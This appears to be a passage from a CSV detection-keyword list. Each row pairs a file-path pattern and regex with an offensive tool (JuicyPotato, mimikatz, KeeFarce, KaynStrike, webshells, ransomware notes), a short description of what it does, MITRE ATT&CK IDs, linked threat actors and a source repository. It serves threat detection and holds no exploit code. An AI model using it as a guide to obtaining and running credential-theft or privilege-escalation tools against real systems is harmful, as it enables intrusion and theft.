"*\Jasmin Ransomware Final\*",".{0,1000}\\Jasmin\sRansomware\sFinal\\.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","16030"
"*\jecretz.py*",".{0,1000}\\jecretz\.py.{0,1000}","offensive_tool_keyword","jecretz","Jira Secret Hunter - Helps you find credentials and sensitive contents in Jira tickets","T1552 - T1114 - T1119 - T1070","TA0006 - TA0009 - TA0005","N/A","Scattered Spider*","Discovery","https://github.com/sahadnk72/jecretz","1","0","N/A","N/A","7","1","43","9","2022-12-08T10:00:11Z","2020-05-25T14:40:28Z","16031"
"*\Jeringa.exe*",".{0,1000}\\Jeringa\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16032"
"*\Jordan RAT.exe*",".{0,1000}\\Jordan\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16033"
"*\Jormungand.sln*",".{0,1000}\\Jormungand\.sln.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","N/A","10","","N/A","","","","16034"
"*\jRAT v0.8d.exe*",".{0,1000}\\jRAT\sv0\.8d\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16037"
"*\JuicyPotato.exe*",".{0,1000}\\JuicyPotato\.exe.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","16038"
"*\JuicyPotato.pdb*",".{0,1000}\\JuicyPotato\.pdb.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16039"
"*\JuicyPotato.pdb*",".{0,1000}\\JuicyPotato\.pdb.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#content","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","16040"
"*\JuicyPotato.pdb*",".{0,1000}\\JuicyPotato\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","JuicyPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16041"
"*\JuicyPotato.pdb*",".{0,1000}\\JuicyPotato\.pdb.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","16042"
"*\JuicyPotato.x64.dll*",".{0,1000}\\JuicyPotato\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16043"
"*\JuicyPotato.x86.dll*",".{0,1000}\\JuicyPotato\.x86\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16044"
"*\JuicyPotato_x32.exe*",".{0,1000}\\JuicyPotato_x32\.exe.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","16045"
"*\JuicyPotato_x64.exe*",".{0,1000}\\JuicyPotato_x64\.exe.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","16046"
"*\JuicyPotato-master*",".{0,1000}\\JuicyPotato\-master.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","16047"
"*\JuicyPotatoNG*",".{0,1000}\\JuicyPotatoNG.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","16048"
"*\JuicyPotato-shellcode\*",".{0,1000}\\JuicyPotato\-shellcode\\.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","16049"
"*\Juicy-Potato-x86-master*",".{0,1000}\\Juicy\-Potato\-x86\-master.{0,1000}","offensive_tool_keyword","Bat-Potato","Automating Juicy Potato Local Privilege Escalation CMD exploit for penetration testers","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/0x4xel/Bat-Potato","1","0","N/A","N/A","10","1","42","11","2022-12-13T20:19:51Z","2022-12-12T20:50:22Z","16050"
"*\JunctionFolder.csproj*",".{0,1000}\\JunctionFolder\.csproj.{0,1000}","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","16051"
"*\JX34qQm7.txt*",".{0,1000}\\JX34qQm7\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","16055"
"*\ka0tic.pl*",".{0,1000}\\ka0tic\.pl.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","16056"
"*\KAdot Universal Shell v0.1.6.php*",".{0,1000}\\KAdot\sUniversal\sShell\sv0\.1\.6\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","16057"
"*\kali-install.sh*",".{0,1000}\\kali\-install\.sh.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","16058"
"*\kali-linux-2023*",".{0,1000}\\kali\-linux\-2023.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","16059"
"*\KARMA-ENCRYPTED.txt*",".{0,1000}\\KARMA\-ENCRYPTED\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","16060"
"*\karmaSMB.exe*",".{0,1000}\\karmaSMB\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16061"
"*\karmaSMB.py*",".{0,1000}\\karmaSMB\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16062"
"*\kaspersky\getCredsKasperskyEntries.h*",".{0,1000}\\kaspersky\\getCredsKasperskyEntries\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","16064"
"*\KAssembly.x64.o*",".{0,1000}\\KAssembly\.x64\.o.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","16065"
"*\katz.ps1*",".{0,1000}\\katz\.ps1.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz powershell alternative name","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","16066"
"*\KaynInject.h*",".{0,1000}\\KaynInject\.h.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","16067"
"*\KaynLdr\KaynInject\*",".{0,1000}\\KaynLdr\\KaynInject\\.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","16068"
"*\KaynLdr-main\*",".{0,1000}\\KaynLdr\-main\\.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","16069"
"*\KaynStrike.cna*",".{0,1000}\\KaynStrike\.cna.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","16070"
"*\KaynStrike\src\*",".{0,1000}\\KaynStrike\\src\\.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","16071"
"*\KaynStrike-main*",".{0,1000}\\KaynStrike\-main.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","16072"
"*\KCMTicketFormatter*",".{0,1000}\\KCMTicketFormatter.{0,1000}","offensive_tool_keyword","KCMTicketFormatter","Format SSSD Raw Kerberos Payloads into CCACHE files for use on Windows systems","T1558.003 - T1550.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/blacklanternsecurity/KCMTicketFormatter","1","0","N/A","N/A","7","1","37","4","2021-05-26T20:23:56Z","2021-05-26T20:17:33Z","16073"
"*\kcredentialprovider.log*",".{0,1000}\\kcredentialprovider\.log.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz log files","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","16074"
"*\kdstab.exe*",".{0,1000}\\kdstab\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","16075"
"*\KeeFarce.exe*",".{0,1000}\\KeeFarce\.exe.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","N/A","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","16076"
"*\KeeFarceDLL.dll*",".{0,1000}\\KeeFarceDLL\.dll.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","N/A","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","16077"
"*\KeePass.sln*",".{0,1000}\\KeePass\.sln.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","16078"
"*\keepass_discover.py*",".{0,1000}\\keepass_discover\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16079"
"*\keepass_export.csv*",".{0,1000}\\keepass_export\.csv.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","N/A","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","16080"
"*\keepass_trigger.py*",".{0,1000}\\keepass_trigger\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16081"
"*\KeePassFox.csproj*",".{0,1000}\\KeePassFox\.csproj.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","16082"
"*\KeePassFox.sln*",".{0,1000}\\KeePassFox\.sln.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","16083"
"*\keeper\getCredskeeper1.h*",".{0,1000}\\keeper\\getCredskeeper1\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","16084"
"*\keeper\getCredskeeper2.h*",".{0,1000}\\keeper\\getCredskeeper2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","16085"
"*\keeper\getCredskeeper3.h*",".{0,1000}\\keeper\\getCredskeeper3\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","16086"
"*\KeePwn.py*",".{0,1000}\\KeePwn\.py.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","16087"
"*\KeePwn\keepwn\*",".{0,1000}\\KeePwn\\keepwn\\.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","16088"
"*\KeePwn-0.3\*",".{0,1000}\\KeePwn\-0\.3\\.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","16089"
"*\KeePwn-main\*",".{0,1000}\\KeePwn\-main\\.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","16090"
